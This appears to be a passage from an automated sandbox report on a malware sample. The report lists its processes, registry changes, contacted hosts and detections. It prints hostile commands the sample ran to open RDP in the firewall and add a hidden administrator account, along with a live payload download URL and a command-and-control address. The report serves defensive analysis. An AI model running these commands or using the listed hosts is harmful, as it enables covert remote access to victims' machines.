                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" PansyBins /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" PansyBins /addJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,4_2_004093C0
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00408908
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,4_2_00412C4A
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,4_2_00412C4C
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: GetLocaleInfoW,4_2_00412C98
                            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00411154 GetLocalTime,4_2_00411154
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 4_2_00414698 GetVersionExW,4_2_00414698
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Modifies the windows firewall
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Uses netsh to modify the Windows network and firewall settings
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

                            Remote Access Functionality

                            barindex
                            Allows multiple concurrent remote connection
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core EnableConcurrentSessionsJump to behavior
                            Enables remote desktop connection
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fDenyTSConnectionsJump to behavior

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
                            Windows Management Instrumentation                            		1
                            LSASS Driver                            		1
                            LSASS Driver                            		21
                            Disable or Modify Tools                            		OS Credential Dumping1
                            System Time Discovery                            		2
                            Remote Desktop Protocol                            		1
                            Archive Collected Data                            		12
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts2
                            Command and Scripting Interpreter                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            System Service Discovery                            		Remote Desktop ProtocolData from Removable Media11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts2
                            Service Execution                            		1
                            Create Account                            		1
                            Access Token Manipulation                            		31
                            Obfuscated Files or Information                            		Security Account Manager2
                            File and Directory Discovery                            		SMB/Windows Admin SharesData from Network Shared Drive1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron21
                            Windows Service                            		21
                            Windows Service                            		12
                            Software Packing                            		NTDS128
                            System Information Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                            Process Injection                            		1
                            Timestomp                            		LSA Secrets211
                            Security Software Discovery                            		SSHKeylogging14
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            DLL Side-Loading                            		Cached Domain Credentials141
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                            Virtualization/Sandbox Evasion                            		Proc Filesystem1
                            System Network Configuration Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523922 Sample: file.exe Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 65 hansgborn.eu 2->65 67 api.ipify.org 2->67 75 Multi AV Scanner detection for domain / URL 2->75 77 Multi AV Scanner detection for dropped file 2->77 79 Multi AV Scanner detection for submitted file 2->79 81 7 other signatures 2->81 9 file.exe 15 3 2->9         started        14 rdpvideominiport.sys 4 2->14         started        16 rdpdr.sys 8 2->16         started        18 tsusbhub.sys 3 2->18         started        signatures3 process4 dnsIp5 69 8.46.123.33, 3389, 49710 AS-PUBMATICUS United States 9->69 71 147.45.44.104, 49702, 80 FREE-NET-ASFREEnetEU Russian Federation 9->71 73 3 other IPs or domains 9->73 57 C:\Users\user\AppData\Local\...\RDPWInst.exe, PE32 9->57 dropped 59 C:\Users\user\AppData\Local\...\file.exe.log, CSV 9->59 dropped 85 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 9->85 20 cmd.exe 1 9->20         started        23 cmd.exe 1 9->23         started        25 cmd.exe 1 9->25         started        27 2 other processes 9->27 file6 signatures7 process8 signatures9 83 Adds a new user with administrator rights 20->83 29 RDPWInst.exe 2 5 20->29         started        33 conhost.exe 20->33         started        35 net.exe 1 23->35         started        37 conhost.exe 23->37         started        39 net.exe 1 25->39         started        41 conhost.exe 25->41         started        43 net.exe 1 27->43         started        45 netsh.exe 2 27->45         started        47 2 other processes 27->47 process10 file11 61 C:\Program Files\RDP Wrapper\rdpwrap.dll, PE32+ 29->61 dropped 63 C:\Windows\System32\rfxvmt.dll, PE32+ 29->63 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Machine Learning detection for dropped file 29->89 91 Uses netsh to modify the Windows network and firewall settings 29->91 93 3 other signatures 29->93 49 netsh.exe 2 29->49         started        51 net1.exe 1 35->51         started        53 net1.exe 1 39->53         started        55 net1.exe 1 43->55         started        signatures12 process13

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            file.exe21%ReversingLabsByteCode-MSIL.Trojan.Zilla
                            file.exe35%VirustotalBrowse
                            file.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe100%Joe Sandbox ML
                            C:\Program Files\RDP Wrapper\rdpwrap.dll54%ReversingLabsWin64.PUA.RDPWrapper
                            C:\Program Files\RDP Wrapper\rdpwrap.dll57%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe68%ReversingLabsWin32.PUA.RDPWrap
                            C:\Windows\System32\rfxvmt.dll0%ReversingLabs

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            api.ipify.org0%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                            https://github.com/bchavez/Bogus.0%VirustotalBrowse
                            https://github.com/bchavez/Bogus/issues/540%VirustotalBrowse
                            http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe23%VirustotalBrowse
                            http://www.apache.org/licenses/0%VirustotalBrowse
                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU0%VirustotalBrowse
                            https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/11%VirustotalBrowse
                            https://github.com/lontivero/Open.Nat/issuesOAlso0%VirustotalBrowse
                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini2%VirustotalBrowse
                            https://loremflickr.com0%VirustotalBrowse
                            https://picsum.photos0%VirustotalBrowse
                            https://placeimg.com0%VirustotalBrowse
                            https://github.com/bchavez/Bogus/issues/1150%VirustotalBrowse
                            http://api.ipify.org0%VirustotalBrowse
                            https://github.com/bchavez/Bogus/wiki/Bogus-Premium0%VirustotalBrowse
                            http://stascorp.com/load/1-1-0-621%VirustotalBrowse
                            https://via.placeholder.com/0%VirustotalBrowse
                            https://hansgborn.eu/core/receive.php0%VirustotalBrowse
                            https://github.com/bchavez/Bogus0%VirustotalBrowse
                            http://api.ipify.org/0%VirustotalBrowse
                            https://github.com/bchavez/Bogus:0%VirustotalBrowse
                            http://147.45.44.10422%VirustotalBrowse

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hansgborn.eu
                            		188.114.97.3
                            		truefalse
                              		unknown
                              api.ipify.org
                              		104.26.13.205
                              		truefalseunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exefalseunknown
                              https://hansgborn.eu/core/receive.phpfalseunknown
                              http://api.ipify.org/falseunknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://github.com/bchavez/Bogus.file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                              http://www.apache.org/licenses/LICENSE-2.0RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drfalseunknown
                              http://api.ipify.orgdfile.exe, 00000001.00000002.1800235734.0000000003021000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://github.com/bchavez/Bogus/issues/54file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniURDPWInst.exe, 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drfalseunknown
                                http://schemas.xmlsoap.org/soap/encoding/file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drfalseunknown
                                https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                https://github.com/lontivero/Open.Nat/issuesOAlsofile.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                https://loremflickr.comfile.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                http://schemas.xmlsoap.org/soap/envelope/file.exe, 00000001.00000002.1800155957.0000000002C80000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRDPWInst.exefalseunknown
                                http://hansgborn.eudfile.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://picsum.photosfile.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                  https://placeimg.comfile.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                  https://hansgborn.eufile.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://hansgborn.eu/core/receive.php4file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/bchavez/Bogus/issues/115file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                      http://api.ipify.orgfile.exe, 00000001.00000002.1800235734.0000000003017000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                      http://stascorp.com/load/1-1-0-62RDPWInst.exe, RDPWInst.exe, 00000004.00000000.1400805486.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.1.drfalseunknown
                                      http://stascorp.comDVarFileInfo$RDPWInst.exe, 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmp, rdpwrap.dll.4.dr, RDPWInst.exe.1.drfalse
                                        		unknown
                                        https://github.com/bchavez/Bogus/wiki/Bogus-Premiumfile.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                        http://hansgborn.eufile.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://github.com/bchavez/Bogusfile.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                          https://via.placeholder.com/file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                          https://hansgborn.eu/core/receive.phpdfile.exe, 00000001.00000002.1800235734.0000000003027000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe4file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://stascorp.cofile.exe, 00000001.00000002.1800235734.0000000002F67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://147.45.44.104file.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000001.00000002.1799416851.0000000000DCF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                https://github.com/bchavez/Bogus:file.exe, 00000001.00000002.1801277227.00000000053A0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000001.00000002.1800235734.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                239.255.255.250
                                                		unknownReserved
                                                		unknownunknownfalse
                                                188.114.97.3
                                                		hansgborn.euEuropean Union
                                                		13335CLOUDFLARENETUSfalse
                                                8.46.123.33
                                                		unknownUnited States
                                                		62713AS-PUBMATICUStrue
                                                147.45.44.104
                                                		unknownRussian Federation
                                                		2895FREE-NET-ASFREEnetEUfalse
                                                104.26.13.205
                                                		api.ipify.orgUnited States
                                                		13335CLOUDFLARENETUSfalse

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1523922
                                                Start date and time:2024-10-02 08:53:41 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 14s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:31
                                                Number of new started drivers analysed:3
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:file.exe
                                                Detection:MAL
                                                Classification:mal100.spre.troj.evad.winEXE@30/9@2/5
                                                EGA Information:
                                                • Successful, ratio: 50%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 139
                                                • Number of non-executed functions: 49
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target file.exe, PID 7404 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                02:55:40API Interceptor1x Sleep call for process: file.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                239.255.255.250file.exeGet hashmaliciousCredential FlusherBrowse
                                                  Remittance[26].htmGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                      404.exeGet hashmaliciousUnknownBrowse
                                                        D0WmCTD2qO.batGet hashmaliciousUnknownBrowse
                                                          c5WMpr1cOc.batGet hashmaliciousUnknownBrowse
                                                            404.exeGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                file.exeGet hashmaliciousCredential FlusherBrowse
                                                                  file.exeGet hashmaliciousCredential FlusherBrowse
                                                                    188.114.97.3payment copy.exeGet hashmaliciousFormBookBrowse
                                                                    • www.cc101.pro/0r21/
                                                                    BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                    • cloud.dellicon.top/1000/500/
                                                                    jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                    • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                                                    Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.rtprajalojago.live/7vun/
                                                                    inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                    • joxi.net/4Ak49WQH0GE3Nr.mp3
                                                                    http://meta.case-page-appeal.eu/community-standard/208273899187123/Get hashmaliciousUnknownBrowse
                                                                    • meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
                                                                    9q24V7OSys.exeGet hashmaliciousFormBookBrowse
                                                                    • www.kzeconomy.top/bopi/?-Z_XO=6kwaqb6m5omublBEUG6Q6qPKP5yOZjcuHwr6+9T02/Tvpmf8nJuTPpmClij6fvBBwm3b&zxltAx=RdCtqlAhlNvlRVfP
                                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/mfctuvFf/download
                                                                    http://brawllstars.ru/Get hashmaliciousHTMLPhisherBrowse
                                                                    • brawllstars.ru/
                                                                    http://aktiivasi-paylaterr.from-resmi.com/Get hashmaliciousUnknownBrowse
                                                                    • aktiivasi-paylaterr.from-resmi.com/
                                                                    8.46.123.33file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                              file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                      GvQcD0PvEH.exeGet hashmaliciousUnknownBrowse

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        hansgborn.eufile.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                        • 188.114.97.3
                                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                        • 188.114.96.3
                                                                                        api.ipify.orgDHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                        • 104.26.12.205
                                                                                        ELECTRONIC RECEIPT_Opcsa.htmlGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 172.67.74.152
                                                                                        grace.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        https://www.canva.com/design/DAGSL2lLp_4/lQGTdiRa89y3fkgkaFc-uQ/edit?utm_content=DAGSL2lLp_4&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 172.67.74.152
                                                                                        Bank Payment $38,735.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.13.205
                                                                                        2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.74.152
                                                                                        2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.12.205

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSpo110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09IMG .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 188.114.96.3
                                                                                        zw15EB2406245 Tc ziraat bankasi. referansl#U0131 Emlakpay_323282-_563028621286 .exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        b222.txt.ps1Get hashmaliciousLummaCBrowse
                                                                                        • 104.21.16.12
                                                                                        AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.78.54
                                                                                        AMG Cargo Logistic.docxGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.216.244
                                                                                        NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 188.114.96.3
                                                                                        risTLdc664.vbsGet hashmaliciousFormBookBrowse
                                                                                        • 188.114.97.3
                                                                                        9gTW6ik1Z1.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                        • 172.66.0.235
                                                                                        NTiwJrX4R4.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                        • 188.114.97.3
                                                                                        FREE-NET-ASFREEnetEUfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        6JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        https://cganet.com/Get hashmaliciousUnknownBrowse
                                                                                        • 147.45.47.98
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                        • 147.45.44.104
                                                                                        AS-PUBMATICUShttp://www.johnhdaniel.comGet hashmaliciousUnknownBrowse
                                                                                        • 185.64.191.210
                                                                                        https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jgGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 185.64.191.210
                                                                                        moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                        • 198.47.127.20
                                                                                        Audio_Msg..00299229202324Transcript.htmlGet hashmaliciousUnknownBrowse
                                                                                        • 185.64.191.210
                                                                                        moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                        • 198.47.127.18
                                                                                        https://content.app-us1.com/1REPZ7/2024/09/30/ff91983f-ef4d-4288-b1e8-8d1ab94f757b.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 198.47.127.205
